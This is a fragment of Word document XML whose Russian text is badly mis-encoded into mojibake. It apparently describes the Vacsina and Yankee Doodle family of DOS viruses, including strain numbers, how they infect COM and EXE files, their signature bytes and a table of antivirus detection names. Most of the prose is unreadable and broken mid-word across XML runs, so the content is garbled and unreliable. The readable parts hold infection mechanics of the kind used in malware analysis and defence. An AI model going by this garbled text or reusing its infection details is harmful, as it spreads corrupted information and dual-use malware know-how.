        <w:t xml:space="preserve">騩 �� ���⮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7A ���� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।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⠬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⮬  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">"��������"  ��������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮��� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ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।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢���� ᫥���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騬 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(��������� ��������� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⠢������ �.�.�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᨨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TP05 �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� ������� ��� ᮧ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TP09 �����⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ॡ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �⮡� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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뫠 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>JMP (��� E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TP16 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ� �ந������ � ��� �ਥ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>- 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ணࠬ��  �ଠ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਢ������  � �ଠ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE � 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ࠣ���� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>132 ����, ����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稢��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">८�ࠧ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE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� ����� ��� �� �ࠢ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>- ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稢訩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ॣ�� ��ࠦ����� ��� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM (����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠣 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AIDSTEST �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᯮ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠪�� "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ॣ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砥� ��� � ��⮪��� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(F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騥 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᨨ  ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TP34 ⠪�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">८�ࠧ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE � COM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 ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਥ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮡ������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��� �� TP16 ��  TP24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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ⠪ ��� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>襩� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦨�� �� 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稭�� �  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᨨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TP35 EXE �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� ��࠭��� ᢮� �ଠ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ������ � ᬥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饭��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>0x12 �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫�  �⮨� �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砫� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �������� �� 16. �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६���� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� ����� �㡫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஫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>F47A � ����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ����� TP45 �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE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 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ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 xml:space="preserve">ᨨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">TP24 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ�������� �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㦨������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨 ��⨢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묨 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ᫥��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騬� �� ������� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ���  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, 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।��� �ࠢ����� �����।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥��� � BIOS, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 xml:space="preserve">ᨨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TP33 ������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਭ����� ���� ����� �� ���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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��� ������� ����� � ���� ������ ᫥���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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� ��  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �   ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮�  � ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ��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 �����   �   ��������      � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>B-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨣ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-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������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E-1206���-05�  05   �   VACSINA-5     � Vacsina virus [Va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E-1212���-04�  04   �   VACSINA-5     � Vacsina virus [Va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       �                 � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Yankee Doodle Virus [Dood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E-1339�TP-16�  10   �   VACSINA-16    � Vacsina virus [Va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E-1760�TP-24�  18   �  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">몠�쭠�    � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Vacsina virus [Va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       � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-2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E-1805�TP-25�  19   �  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>몠�쭠�    � �� ��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       � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-2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�-2685���-33�  21   �  ������-33      � Yankee Do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       �                 � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Yankee Doodle Virus [Dood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E-2668���-34�  22   �  ������-34      � Vacsina virus [Va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       �                 � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Yankee Doodle Virus [Dood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E-2656���-38�  26   �  ������-38      � Yankee Do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E-2672���-39�  27   �  ������-39      � Yankee Do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E-2932���-41�  29   �  ������-41      � Yankee Do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E-2885�TP-44�  2C   �  ������-44      � Yankee Doodle    2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E-2901�TP-45�  2D   �  ������-45      � �� ��⥪����   28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⠪�� �����, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN Yankee Doodle Short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䥪⮬ ���� �� 䠪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� �᫨ �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>設�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬���,  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠���� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��� c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訬 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१�ࠦ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��� �  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>訬  �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.�.  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">१������ ����� �ᯮ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠪�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� ��� ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樠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砩 � ������� ⥫� ����� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥����). ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬠ�ਢ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﬠ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᠭ��� ��� ��ன </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Animal,  ��� �������⨢��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>楫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砥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⠬��, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">室�騥 � ������ ��㯯� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� ��।� �����  ࠧ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㯯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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯�  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>VACSINA.  �� ���� �⠬�� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� � �� 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ঠ� ��ப� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>VACSINA. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬� ⮣� ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">८�ࠧ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-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COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� � ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠯� (�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਥ��஢�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">筮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TP04 - TP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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯�  ��몠�쭮�  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �⠬��,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�騥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㯯� ����� ������� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਥ��஢�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>19-T�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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� ��몠���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �⠬��, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�騥 � �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�� ������� � 17 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稭�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TP38 �������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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室� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">१������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䨫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢ � ����� �� ����஢�� ��  ��ࠦ�����  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ਥ��஢�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">筮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TP33-TP4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⥪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢�⥫��  ������  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� �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acsina virus [Vacs]" ��� "Yankee Doodle Virus [Doodle]",  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祬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  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮 �� ����砥� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ᠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>易�� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>襭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⢮� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨣ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㥬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⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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. �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>VACS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 xml:space="preserve">㯯� ����稫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� �������� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>裡 � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, 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騥 � ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠬�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮤ�ঠ� ��ப� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"VACSINA".  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM, ⠪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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祬 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭠� ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ॢ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">蠥� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>64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ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥ �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">믮������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥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ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� ������ ������ �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� �����뢠�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� 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COM- � EXE-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⠬�� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯�  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠡ��ᯮᮡ��  �� �� ���ᨨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�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ᨨ � ⥫� �����  ��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>墠�뢠��  ���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ࠦ����� ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쪮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">騥 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>e��� 63� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稭��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 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">室� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(���� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮤ�ঠ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>E9h). ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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M-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� 㢥��稢����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祬 ��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮧ����� � ��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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������ ������⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ��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뢠�� ⥫� � ����� 䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��⠢��� � ���� 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室� �� ��砫� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� 㢥��稢��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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��⭮�� 16, ���⮬� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�� �������筮 㪮�稢��� 䠩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� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稭� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>- ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室��� ����� 䠩�� ������ ���� �����祭� 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 � ���� ⥫� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">࠭���� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>F4h, 7Ah,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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ����� �OM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩� 㦥 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��� �믮������ ������ ��㯯��  �祭� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮���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 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� �����뢠���� ������� ���室� �� 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 ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥 ⥫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠢��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮡ��  ����  �����  ࠧ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 (84h),  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稢����� ����㧪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �.�.  �� ��� ��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稪</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).  ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ���⥬�� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
